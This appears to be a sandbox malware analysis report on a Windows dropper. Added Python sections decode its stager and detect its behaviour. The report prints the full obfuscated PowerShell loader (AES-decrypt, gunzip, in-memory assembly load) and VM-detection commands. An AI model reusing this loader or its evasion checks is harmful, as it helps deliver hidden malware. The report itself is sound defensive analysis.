
Windows Analysis Report
XgKnAQpuPM.exe

Overview

General Information

Sample name: XgKnAQpuPM.exe (renamed because the original name is a hash value)
Original sample name: 52c1acdcbb715dd099648b26b98254e8.exe
Analysis ID: 1528503
MD5: 52c1acdcbb715dd099648b26b98254e8
SHA1: e3cd07adc9d8fe7c2fbb07730845af6555af2e66
SHA256: 8dc774bd289aeb18dee994fea6e69039d9c6e77a1b90a0d9db004109735ef3f9
Tags: 64exe

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected UAC Bypass using CMSTP
.NET source code contains a sample name check
.NET source code contains potential unpacker
Modifies the context of a thread in another process (thread injection)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • XgKnAQpuPM.exe (PID: 5192 cmdline: "C:\Users\user\Desktop\XgKnAQpuPM.exe" MD5: 52C1ACDCBB715DD099648B26B98254E8)
    • cmd.exe (PID: 5564 cmdline: cmd /c "vclib.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 5840 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • findstr.exe (PID: 6700 cmdline: findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • cmd.exe (PID: 796 cmdline: cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 
'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 3352 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
        • WerFault.exe (PID: 3364 cmdline: C:\Windows\system32\WerFault.exe -u -p 3352 -s 1576 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • rundll32.exe (PID: 4064 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
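The vclib.bat stage visible in the cmd.exe (PID 796) command line above works as follows: it reads its own batch file, takes the first line beginning with ':: ', splits it on '\' into two base64 blobs, and runs each one through FpxON (AES-CBC, PKCS7 padding, hard-coded key and IV), ogptr (gzip decompression) and VcYYT (Assembly.Load of the bytes, then EntryPoint.Invoke with an empty string[]). The .NET type names are hidden by inserting 'blck' into each string and calling .Replace('blck', '') before Invoke-Expression. The following Python is an added example, not part of the Joe Sandbox report: it undoes that string splitting on an excerpt of the recorded command line, pulls the key and IV out of the decryptor, and parses the ':: ' line convention on a constructed stand-in for vclib.bat (the two segments there are placeholders, not the sample's payload).

```python
"""Static triage of the vclib.bat PowerShell stager (added example, not from the report)."""
from __future__ import annotations

import base64
import re

# Excerpt of the stager exactly as recorded in the cmd.exe (PID 796) command
# line: the FpxON decryptor and the VcYYT loader in full, plus the GZipStream
# line from ogptr and the first FromBase64String call from the main body.
STAGER_EXCERPT = (
    "function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); "
    "$MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; "
    "$MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; "
    "$MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); "
    "$MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); "
    "$WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); "
    "$WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}"
    "Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); "
    "function VcYYT($kXGHT,$GOojW){ "
    "Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); "
    "Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); "
    "Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}"
    "Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');"
)

# Invoke-Expression '<single-quoted text>'.Replace('<token>', '')  (PowerShell
# escapes a quote inside a single-quoted string as '').
IEX_REPLACE = re.compile(r"Invoke-Expression\s+'((?:[^']|'')*)'\.Replace\('([^']+)',\s*''\)")
AES_MATERIAL = re.compile(r"\.(Key|IV)=\[System\.Convert\]::FromBase64String\('([A-Za-z0-9+/=]+)'\)")

# Markers of each pipeline stage, in the order the stager executes them.
STAGES = (
    ("[Convert]::FromBase64String", "base64-decode a segment of the ':: ' line"),
    ("[System.Security.Cryptography.CipherMode]::CBC", "AES-CBC/PKCS7 decrypt with the hard-coded key and IV (FpxON)"),
    ("System.IO.Compression.GZipStream", "gzip-decompress (ogptr)"),
    ("[System.Reflection.Assembly]::Load", "load the result as a .NET assembly in memory (VcYYT)"),
    (".EntryPoint", "invoke its entry point with an empty string[] (VcYYT)"),
)

# Constructed stand-in for vclib.bat (the segments are placeholders; in the
# real file they are the encrypted, compressed assemblies).
SAMPLE_BAT = "\r\n".join([
    "@echo off",
    ":: QUJD\\REVG",
    "powershell.exe -WindowStyle Hidden",
])


def resolve_replace_obfuscation(script: str) -> str:
    """Inline every Invoke-Expression '<text>'.Replace('<token>', '') as the text
    PowerShell actually evaluates: quote escapes undone, token removed."""
    def inline(m: re.Match) -> str:
        body, token = m.group(1).replace("''", "'"), m.group(2)
        return body.replace(token, "")
    return IEX_REPLACE.sub(inline, script).replace(";;", ";")


def extract_aes_material(script: str) -> dict[str, bytes]:
    """Hard-coded AES key and IV assigned in the decryptor, as raw bytes."""
    return {name: base64.b64decode(b64) for name, b64 in AES_MATERIAL.findall(script)}


def load_chain(script: str) -> list[str]:
    """Pipeline stages recognisable in the script; on the obfuscated text most
    markers are split by the token and only the AES setup is visible."""
    return [what for needle, what in STAGES if needle in script]


def payload_segments(batch_text: str) -> list[str]:
    """Mirror of the stager's own lookup: first ':: ' comment line, split on '\\'."""
    for line in batch_text.splitlines():
        if line.startswith(":: "):
            return line[3:].split("\\")
    return []


if __name__ == "__main__":
    clean = resolve_replace_obfuscation(STAGER_EXCERPT)
    print(clean)
    for name, raw in extract_aes_material(STAGER_EXCERPT).items():
        print(f"{name}: {len(raw)} bytes {raw.hex()}")
    for step in load_chain(clean):
        print(" ->", step)
    print("segments:", payload_segments(SAMPLE_BAT))
```

The recovered key is 32 bytes and the IV 16 bytes, so the stager uses AES-256-CBC. To finish extraction on the real vclib.bat, feed each segment returned by payload_segments through base64 decoding, AES-256-CBC decryption with that key and IV, PKCS7 unpadding and gunzip; each result is the .NET assembly the loader hands to Assembly.Load.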
No configs have been found
Yara matches (memory dumps)
Source: 00000007.00000002.2185544424.000001C6916F8000.00000004.00000001.00020000.00000000.sdmp, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: 00000007.00000002.2029388668.000001C68BEA1000.00000004.00000001.00020000.00000000.sdmp, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: 00000007.00000002.2185544424.000001C691B00000.00000004.00000001.00020000.00000000.sdmp, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: 00000007.00000002.2185544424.000001C690CF8000.00000004.00000001.00020000.00000000.sdmp, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 3352, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
(1 further entry not shown)

Yara matches (unpacked PE files)
Source: 7.2.powershell.exe.1c691b00b88.3.unpack, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: 7.2.powershell.exe.1c690beb3b8.8.unpack, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: 7.2.powershell.exe.1c691600b50.7.unpack, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: 7.2.powershell.exe.1c691b00b88.3.raw.unpack, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security

                    System Summary

                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 
'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] ('')); , CommandLine: cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8M
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 
'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] ('')); , CommandLine: cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8M
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XgKnAQpuPM.exe, ProcessId: 5192, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c "vclib.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5564, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 3352, ProcessName: powershell.exe
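The Sigma hits above fire on the plaintext command line and, for the FromBase64String rule, on its base64offset variants: Sigma's base64offset modifier emits the three base64 spellings a string can take depending on its byte offset mod 3 inside the encoded data. The Python below is an added example, not from the report or from the Sigma project. It re-implements base64offset (for ASCII and for the UTF-16LE form that powershell -EncodedCommand carries), scores the command lines recorded in this report's process tree against the behaviours the report flags (the WMI disk-model query piped to findstr for VM disk strings, hidden PowerShell, FromBase64String, AES set up in the command line, .Replace string splitting, cmd /c echo feeding a script), and correlates children of the same parent so the evasion check followed by the hidden PowerShell under cmd.exe 5564 becomes one finding. The -EncodedCommand sample and the 2048-character length threshold are constructed choices. The RunOnce\wextract_cleanup0 value flagged by the autorun rule is the IExpress/wextract self-extractor's own cleanup hook (the report's wextract.pdb and OriginalFilename WEXTRACT.EXE strings confirm the wrapper), so rundll32 advpack.dll,DelNodeRunDLL32 over IXP000.TMP is deliberately not treated as an indicator.

```python
"""Detection logic for the stager's process-creation events (added example)."""
from __future__ import annotations

import base64
import re
from collections import defaultdict

# Command lines (pid, ppid, cmdline) from the process tree in this report; the
# cmd.exe 796 line is shortened here (the recorded one is 2701 characters).
REPORT_EVENTS = [
    (5840, 5564, 'wmic diskdrive get Model'),
    (6700, 5564, 'findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A"'),
    (796, 5564, "cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); ... "
                "$MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); ... "
                "Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); ..."),
    (3352, 5564, 'powershell.exe -WindowStyle Hidden'),
    (4064, None, '"C:\\Windows\\system32\\rundll32.exe" C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 '
                 '"C:\\Users\\user\\AppData\\Local\\Temp\\IXP000.TMP\\"'),
]

# Constructed: the same FromBase64String call wrapped in -EncodedCommand
# (UTF-16LE then base64), which the plaintext regexes cannot see.
ENCODED_SAMPLE = "powershell.exe -nop -w hidden -EncodedCommand " + base64.b64encode(
    "$b=[Convert]::FromBase64String($nciXK[0]);".encode("utf-16-le")).decode()

INDICATORS = (
    ("vm_disk_model_check", re.compile(r"wmic\s+diskdrive\s+get\s+Model", re.I)),
    ("vm_disk_model_strings", re.compile(r'findstr\s+/i\s+/c:"(?:QEMU|DADY) HARDDISK"', re.I)),
    ("hidden_powershell", re.compile(r"powershell(?:\.exe)?\s.*-w(?:indowstyle)?\s+hidden", re.I)),
    ("frombase64string", re.compile(r"FromBase64String", re.I)),
    ("aes_cbc_in_cmdline", re.compile(r"Cryptography\.Aes\]::Create\(\)", re.I)),
    ("replace_string_splitting", re.compile(r"\.Replace\('([A-Za-z0-9]{2,8})',\s*''\)")),
    ("cmd_echo_script", re.compile(r"cmd(?:\.exe)?\s+/c\s+echo\s+function\s", re.I)),
)
LONG_CMDLINE = 2048  # threshold chosen here; the report flags a 2701-character line
FINDING = "sandbox-evasion disk check followed by hidden PowerShell loader"


def base64offset(needle: bytes) -> list[str]:
    """Sigma's base64offset modifier: the three base64 spellings of needle for
    offsets 0, 1 and 2 mod 3. Leading/trailing characters that also depend on
    neighbouring bytes are cut, so each variant is a pure substring of any
    base64 text whose decoded bytes contain needle at that alignment."""
    starts = (0, 2, 3)
    ends = (None, -3, -2)
    return [
        base64.b64encode(b" " * i + needle)[starts[i]:ends[(len(needle) + i) % 3]].decode()
        for i in range(3)
    ]


def contains_encoded(cmdline: str, needle: str) -> bool:
    """needle hidden in base64 as ASCII (Sigma base64offset) or as UTF-16LE
    (Sigma wide|base64offset, the -EncodedCommand case)."""
    variants = base64offset(needle.encode()) + base64offset(needle.encode("utf-16-le"))
    return any(v in cmdline for v in variants)


def command_line_indicators(cmdline: str) -> set[str]:
    """Names of the behaviours one process-creation event exhibits."""
    hits = {name for name, rx in INDICATORS if rx.search(cmdline)}
    if len(cmdline) >= LONG_CMDLINE:
        hits.add("very_long_cmdline")
    if contains_encoded(cmdline, "FromBase64String"):
        hits.add("base64_encoded_frombase64string")
    return hits


def correlate_by_parent(events) -> dict:
    """Union the children's indicators per parent PID and report parents that
    run the disk-model VM check and then a hidden PowerShell (cmd.exe 5564)."""
    by_parent = defaultdict(set)
    for _pid, ppid, cmdline in events:
        by_parent[ppid] |= command_line_indicators(cmdline)
    return {ppid: FINDING for ppid, hits in by_parent.items()
            if {"vm_disk_model_check", "vm_disk_model_strings"} <= hits and "hidden_powershell" in hits}


def alignment_coverage(needle: str) -> list[bool]:
    """Encode '<prefix><needle>)' with 0-, 1- and 2-byte prefixes, as ASCII and
    as UTF-16LE, and check each is caught: shows why one base64(needle)
    string is not enough and three offset variants are."""
    results = []
    for prefix in ("", "a", "ab"):
        for enc in ("ascii", "utf-16-le"):
            blob = base64.b64encode((prefix + needle + ")").encode(enc)).decode()
            results.append(contains_encoded(blob, needle))
    return results


if __name__ == "__main__":
    for pid, ppid, cmdline in REPORT_EVENTS:
        print(pid, ppid, sorted(command_line_indicators(cmdline)))
    print("encoded sample:", sorted(command_line_indicators(ENCODED_SAMPLE)))
    print("findings:", correlate_by_parent(REPORT_EVENTS))
    print("alignment coverage:", alignment_coverage("FromBase64String"))
```

The per-parent correlation is what turns four individually weak events (a WMIC query, a findstr, a hidden PowerShell, a long cmd line) into one alert; the rundll32 cleanup line yields no indicators and is excluded on purpose.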
                    No Suricata rule has matched

Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, Code function: 0_2_00007FF776D13214 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA

                    Exploits

Source: Yara match, File source: 7.2.powershell.exe.1c691b00b88.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.powershell.exe.1c690beb3b8.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.powershell.exe.1c691600b50.7.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.powershell.exe.1c691b00b88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000007.00000002.2185544424.000001C6916F8000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.2029388668.000001C68BEA1000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.2185544424.000001C691B00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.2185544424.000001C690CF8000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3352, type: MEMORYSTR
Source: XgKnAQpuPM.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: Binary string: System.Configuration.Install.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Data.pdb source: WERAC0C.tmp.dmp.10.dr
